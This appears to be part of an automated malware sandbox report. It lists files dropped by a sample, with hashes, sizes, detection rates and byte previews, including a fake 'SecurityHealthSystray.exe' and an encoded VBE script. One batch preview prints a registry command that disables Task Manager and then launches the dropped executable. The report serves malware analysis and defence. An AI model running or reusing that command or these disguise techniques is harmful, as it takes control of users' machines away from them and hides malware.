SHA-512:	80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 21%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\ldZbGFkR.log

Download File

Process:	C:\portBrokerDll\DriverbrokerCrtDhcp.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	41472
Entropy (8bit):	5.6808219961645605
Encrypted:	false
SSDEEP:	768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
MD5:	6CD78D07F9BD4FECC55CDB392BC5EC89
SHA1:	094DE32070BED60A811D983740509054AD017CE4
SHA-256:	16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
SHA-512:	5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................... ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........s...D...........r............................................................................................................................................................................9..A..%+..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\lmJukoKX.log

Download File

Process:	C:\portBrokerDll\DriverbrokerCrtDhcp.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	34304
Entropy (8bit):	5.618776214605176
Encrypted:	false
SSDEEP:	768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
MD5:	9B25959D6CD6097C0EF36D2496876249
SHA1:	535B4D0576746D88537D4E9B01353210D893F4D2
SHA-256:	4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
SHA-512:	C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 9%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t\|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\ogLKbooN.log

Download File

Process:	C:\portBrokerDll\DriverbrokerCrtDhcp.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	33280
Entropy (8bit):	5.634433516692816
Encrypted:	false
SSDEEP:	384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
MD5:	0D323E1CACEA89CAA5DDEAF2F37BCA69
SHA1:	4769C3E947D02A1FD548BE64013F520D571D96E1
SHA-256:	873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
SHA-512:	73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................\|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\paukoYZl.log

Download File

Process:	C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.529329139831718
Encrypted:	false
SSDEEP:	384:ka1bzkw+rsI7GpusgGjLtdPh39rHjN61B7oezUCb2sI:ka5z3IifgGjJdPZ9rDYjtzUmI
MD5:	8AE2B8FA17C9C4D99F76693A627307D9
SHA1:	7BABA62A53143FEF9ED04C5830CDC3D2C3928A99
SHA-256:	0B093D4935BD51AC404C2CD2BB59E2C4525B97A4D925807606B04C2D3338A9BE
SHA-512:	DEFDF8E0F950AA0808AA463363B0091C031B289709837770489E25EC07178D19425648A4109F5EFD0A080697FA3E52F63AABF005A4CCD8235DF61BB9A521D793
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ...............................c....@.................................ts..W.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H........O...#...........N......................................................................................................................................................................o+.tEy...7..o.v.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\pczkrlLQ.log

Download File

Process:	C:\portBrokerDll\DriverbrokerCrtDhcp.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	38912
Entropy (8bit):	5.679286635687991
Encrypted:	false
SSDEEP:	768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
MD5:	9E910782CA3E88B3F87826609A21A54E
SHA1:	8DBC333244620EDA5D3F1C9EAA6B924455262303
SHA-256:	3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
SHA-512:	592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\qodKYthi.log

Download File

Process:	C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	39936
Entropy (8bit):	5.629584586954759
Encrypted:	false
SSDEEP:	768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
MD5:	D478E398EFCD2BD9BDBFEA958F7BEE4F
SHA1:	24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
SHA-256:	32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
SHA-512:	0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\remTNUPL.log

Download File

Process:	C:\portBrokerDll\DriverbrokerCrtDhcp.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	36352
Entropy (8bit):	5.668291349855899
Encrypted:	false
SSDEEP:	384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
MD5:	94DA5073CCC14DCF4766DF6781485937
SHA1:	57300CA6033974810B71CF1AB4F047A026924A7A
SHA-256:	B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
SHA-512:	7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 21%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......pi..T;...........g..x........................................................................................................................................................................XWJ..%.v0................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\tBjJkMRH.log

Download File

Process:	C:\portBrokerDll\DriverbrokerCrtDhcp.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	126976
Entropy (8bit):	6.057993947082715
Encrypted:	false
SSDEEP:	3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
MD5:	16B480082780CC1D8C23FB05468F64E7
SHA1:	6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
SHA-256:	7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
SHA-512:	A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 21%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................

C:\Users\user\Desktop\uOpJsBHp.log

Download File

Process:	C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	126976
Entropy (8bit):	6.057993947082715
Encrypted:	false
SSDEEP:	3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
MD5:	16B480082780CC1D8C23FB05468F64E7
SHA1:	6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
SHA-256:	7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
SHA-512:	A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 21%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................

C:\Users\user\Desktop\vMsrqipz.log

Download File

Process:	C:\portBrokerDll\DriverbrokerCrtDhcp.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	34816
Entropy (8bit):	5.636032516496583
Encrypted:	false
SSDEEP:	384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
MD5:	996BD447A16F0A20F238A611484AFE86
SHA1:	CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
SHA-256:	0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
SHA-512:	80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 21%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\vcvJAqxW.log

Download File

Process:	C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	70144
Entropy (8bit):	5.909536568846014
Encrypted:	false
SSDEEP:	1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
MD5:	E4FA63649F1DBD23DE91861BB39C317D
SHA1:	25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
SHA-256:	CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
SHA-512:	C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 29%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\xvoKkvvU.log

Download File

Process:	C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	294912
Entropy (8bit):	6.010605469502259
Encrypted:	false
SSDEEP:	6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
MD5:	00574FB20124EAFD40DC945EC86CA59C
SHA1:	8B96C4B6F450E711085AE7B22517C195222ACFDF
SHA-256:	3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
SHA-512:	B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 11%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe

Download File

Process:	C:\portBrokerDll\DriverbrokerCrtDhcp.exe
File Type:	MS-DOS executable PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows, MZ for MS-DOS
Category:	dropped
Size (bytes):	3420843
Entropy (8bit):	7.992393726932408
Encrypted:	true
SSDEEP:	98304:2azh3piA6B85AR1lznmf/50X4ajKeSHqCwvHJ7pP2U:hzh3pgBzHZs50X5YM9
MD5:	C9D8BCE0425ED81346B9A43F148D948B
SHA1:	D3BCB8F02EF3732FFA70FC798CD4AD3D77BBBDE6
SHA-256:	884DE0BA4D113A1674B112F76B7D6AF9BB11C562D6B58155E974E549694E0F58
SHA-512:	60E0D21DB0518D66F4546DCEB978B15D2EB87347CC1676B7420EB2A6C4C1C6FA947D31AE8CB70CE880B76F931702AAAB51C46F559DD91A49C9A4BDC83B75368B
Malicious:	true
Preview:	MZ@.....................................!..L.!It's .NET EXE$@...PE..L....&.M............................^.... ...@....@.. ....................................@.....................................O....@.. ....................`....................................................... ............... ..H............text...d.... ...................... ..`.rsrc... ....@......................@..@.reloc.......`......................@..B...........................................................................v2.19@.......H.......d&...............................................................0............%..,....i-....+...........%..,....i-.....+...................XGR......8.........%.X.XG..........-.....c.........XG.b.X.......8....... ...._ .............:]........XJ..........-....c....X... ...._... .............-@....c....._..........-....X... ...._ ....X....a...+....._.X...+}....c....._....E............%...;...+V...?_.X..+K..X... ...._.AX....a..+3.. .?.._ A...X....X.+....XX... ...._ AD..X.

C:\Windows\System32Local\d4d0c4061cb618

Download File

Process:	C:\portBrokerDll\DriverbrokerCrtDhcp.exe
File Type:	ASCII text, with very long lines (813), with no line terminators
Category:	dropped
Size (bytes):	813
Entropy (8bit):	5.901049085746739
Encrypted:	false
SSDEEP:	24:avtpqH0Vl3ssxkH22HxqcpxDPTqd5MTL0eW:avtpqH0Vl8sxp2HxqexDPTWsW
MD5:	4632619EBE0473EFA1C9A63235C768B7
SHA1:	2BF3C958D83A7C14E825E99F685C8BED7B310F1B
SHA-256:	EA19755BD9B74CB3E72986160441F34C54586E564B27D1B52698E1F6B3868109
SHA-512:	8F9A3985257AF732D5EBA9DE28DF90167BBB019CDEF010D5D5F7D8C35AAA817D7CA2B1589D4B549CA2A623E80BDB0D7D2974971D56F9224F24CDFF60D4F25623
Malicious:	false
Preview:	qV8TWdEKJFEN1SDF4eeMBMk6Q4GKUaylA9NbbqjlRwELKBaS0qncxPweuBCbX30tRcM2EmnO425PHZwOexUnwVyvMtqanHOX6V3rzhNNCZh4ThXUPx7jjM75obpV5NkxohSvfEZ7jGlWx3bpVVKzKoyuY7CX11RyzuQwOmzLY9AclkIv9AAjDumAtiXiBBFrywhDmpasg9bKnVIxzRY11rvEHQCpOQJW4SnyDEITjRDETcWYZksunO0HBd5WnuePzFQVrUtuIFRjoqup4oQohYtpcgwkJwqyxxOOMBqF08mi6RcVsQc9ezraWk3KhJlVYdv1bgd37LxjwLsKDb22UrT7Fx1lHfhrXQJdfl3LxjBTBIoK1sHGQsBrJxvno1vbnGMfBPpciqEvpA67JrtZYbaoPbTszPg5xkp55JImDohjoPCJ1ye7IVCMpiPk57nSKJ7EUAB9iGWu30A9YK0AvixchdPX3irGBPZfS8z0xeZB9STyiPMvGmhlVfg1unG9ZPsnberaV9NQIvcPKbzoW59ZsxJxb8FJYamtjpXDivaGZQckCRqTybndPT5nV39W4D1sItqeEvFkf3AcUivJRwV6wIdPutrowDMVYubTlMPCVC7WTcTwIzFIr559PauVEbycroDkHbiFgSluKH6RZ4f77EodybEKb484OfppZspqQAlYTLzIec5J51emAkvpXXnmUqgpbR2qPzq7dPJmm5q98z8XBCoy79S2X8EnpJqNkO3GKhJvaJDbqonesIoYmDtPgykeKg7cPdZu51Md33Yx60LsVj4gfRkgeokW7pk4L

C:\Windows\System32\CSC3568A44F8D2D461ABD894E9C160B8C.TMP

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	1224
Entropy (8bit):	4.435108676655666
Encrypted:	false
SSDEEP:	24:OBxOysuZhN7jSjRzPNnqNdt4+lEbNFjMyi07:COulajfqTSfbNtme
MD5:	931E1E72E561761F8A74F57989D1EA0A
SHA1:	B66268B9D02EC855EB91A5018C43049B4458AB16
SHA-256:	093A39E3AB8A9732806E0DA9133B14BF5C5B9C7403C3169ABDAD7CECFF341A53
SHA-512:	1D05A9BB5FA990F83BE88361D0CAC286AC8B1A2A010DB2D3C5812FB507663F7C09AE4CADE772502011883A549F5B4E18B20ACF3FE5462901B40ABCC248C98770
Malicious:	false
Preview:	.... ...........................\|...<...............0...........\|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...\.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <securi

C:\Windows\System32\SecurityHealthSystray.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	4608
Entropy (8bit):	3.9538320222830885
Encrypted:	false
SSDEEP:	48:6upHPtVM7Jt8Bs3FJsdcV4MKe27GXfZuvqBHaOulajfqXSfbNtm:RPMPc+Vx9MGPZuvkEcjRzNt
MD5:	5E77E0AA2AE8F53E6CAA28CC4FC4FEFF
SHA1:	6A8B8AF20370F7E792AEB988E5A6E03DABDE52B6
SHA-256:	335F0386170449733D373B4DB82B268EED6B295FF490312E3389CA582BE3BFE4
SHA-512:	F78BCC6E9BEE523888E8BB1C2CE661B79F692EEDF355F39802F21D2CF6313473CB9EA4A3CCDDC698FC81E310C24D267F9E1BF06E62DAA5743EABC6200856695A
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.... .g.............................'... ...@....@.. ....................................@.................................P'..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......(!..(.............................................................(.....0..!.......r...pre..p.{....(....(....&..&......................0..........ri..p(....&..&......................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(......(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings....4.......#US.........#GUID....... ...#Blob...........WU........%3................................................................

C:\portBrokerDll\2jfojLJgRy.vbe

Download File

Process:	C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe
File Type:	data
Category:	dropped
Size (bytes):	237
Entropy (8bit):	5.838308466940053
Encrypted:	false
SSDEEP:	6:Gz2wqK+NkLzWbHyrFnBaORbM5nCuxx/VuYlIs:GPMCzWLyhBaORbQCi/Vui3
MD5:	851D51CDEE60A57D4AEF51EA7F466436
SHA1:	34A13967E69D21091850D4F0DFFB2BCE88C80E0C
SHA-256:	5D612089C06BBE2B32DE8BFCC3E0BA1E0EF2155CD6CDE83B280797C6061CA269
SHA-512:	7FED60DA3ED3FF2A26B8B4CADF0CF6CD3E28259A4A7EC7E3BA97509FA47B7CA75753CA49EDF2F218AE323830977C2ECDFB2F05B6FA5DE303038C31012926E953
Malicious:	false
Preview:	#@~^1AAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE@#@&.U^DbwO UV+n2vF{!ZT@#@&U+DP.ktU4+^V~',Z.nmY+}8L.mYvE.?1DbwORj4.VsJ@#@&q/4j4+Vs "EUPr/=z2KDDADK3..f^V&zzmV8vHlBE\&m~i"Z.E\0]hO+ZSeD&h2;393K ;4nF9].c8mYEBPZ~P6l^d+/UIAAA==^#~@.

C:\portBrokerDll\Ac4k16M5JuZ3cBUzCeuZfRwt20LYrImECkDEo2qhe7JRV.bat

Download File

Process:	C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	194
Entropy (8bit):	5.3590465198197075
Encrypted:	false
SSDEEP:	3:++GoBZwXD9so3KRfyM1K7eB/k+7W34hebJNAKyMhF7FKNbejZDzAXBFAXhJE1qwj:++GcStuH1jhRiI36BWsV8RwEsk2PA
MD5:	69C0EDF85B6D3AB82C42E82EF04F50F7
SHA1:	7ACB4D2454D9E04DB488C2EE4352CFECE1B8AE58
SHA-256:	3041CC5E5C4251EA1EDDCCAA5D145446719D6E86DCFD3BC40BC23C80B3102EC2
SHA-512:	04877F967609E6EFB4A8C4F99C4130B3894EB223F390D32C6E2248ABAF1BDFF71F539F122635F18FA432648B927CC597DD7BDAA52284824F8C57C7909F7DCA21
Malicious:	false
Preview:	%LSWXAH%reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f%YdnUMRjw%..%QowIrUfTNWDuGuv%"C:\portBrokerDll/DriverbrokerCrtDhcp.exe"%fNoj%

C:\portBrokerDll\DriverbrokerCrtDhcp.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe
File Type:	MS-DOS executable PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows, MZ for MS-DOS
Category:	dropped
Size (bytes):	3420843
Entropy (8bit):	7.992393726932408
Encrypted:	true
SSDEEP:	98304:2azh3piA6B85AR1lznmf/50X4ajKeSHqCwvHJ7pP2U:hzh3pgBzHZs50X5YM9
MD5:	C9D8BCE0425ED81346B9A43F148D948B
SHA1:	D3BCB8F02EF3732FFA70FC798CD4AD3D77BBBDE6
SHA-256:	884DE0BA4D113A1674B112F76B7D6AF9BB11C562D6B58155E974E549694E0F58
SHA-512:	60E0D21DB0518D66F4546DCEB978B15D2EB87347CC1676B7420EB2A6C4C1C6FA947D31AE8CB70CE880B76F931702AAAB51C46F559DD91A49C9A4BDC83B75368B
Malicious:	true
Preview:	MZ@.....................................!..L.!It's .NET EXE$@...PE..L....&.M............................^.... ...@....@.. ....................................@.....................................O....@.. ....................`....................................................... ............... ..H............text...d.... ...................... ..`.rsrc... ....@......................@..@.reloc.......`......................@..B...........................................................................v2.19@.......H.......d&...............................................................0............%..,....i-....+...........%..,....i-.....+...................XGR......8.........%.X.XG..........-.....c.........XG.b.X.......8....... ...._ .............:]........XJ..........-....c....X... ...._... .............-@....c....._..........-....X... ...._ ....X....a...+....._.X...+}....c....._....E............%...;...+V...?_.X..+K..X... ...._.AX....a..+3.. .?.._ A...X....X.+....XX... ...._ AD..X.

C:\portBrokerDll\a05c1cd25e80d0

Download File

Process:	C:\portBrokerDll\DriverbrokerCrtDhcp.exe
File Type:	ASCII text, with very long lines (642), with no line terminators
Category:	dropped
Size (bytes):	642
Entropy (8bit):	5.907897479167952
Encrypted:	false
SSDEEP:	12:PR1iTX8iS55KadbYmSJ7Rs9stmoDzwBD3ujUW5TCSA8Zyf8v8vBDZt4SyBoF3h1n:p1eeDKadbrhKtDzwBD+j9TCSAn7hctB2
MD5:	26F8C80A79A2F3A5A8E44FBECD04E3F5
SHA1:	2A7865D6D7CD33D2943191CD1DC276A9FCA76D20
SHA-256:	564AB8E251E976EC5FF1772FD5E7A6E6FBF6D4FAA1F100A20AE9BB564D906F66
SHA-512:	494A64989318A0C802B3F3EFE8E161601F9E9B9F2946D14F2AC7C531D133A5C4BF18A7F660AF1E53A6287DDABB13060C29B69A64353BA9BCA92E0AF7372051AD
Malicious:	false
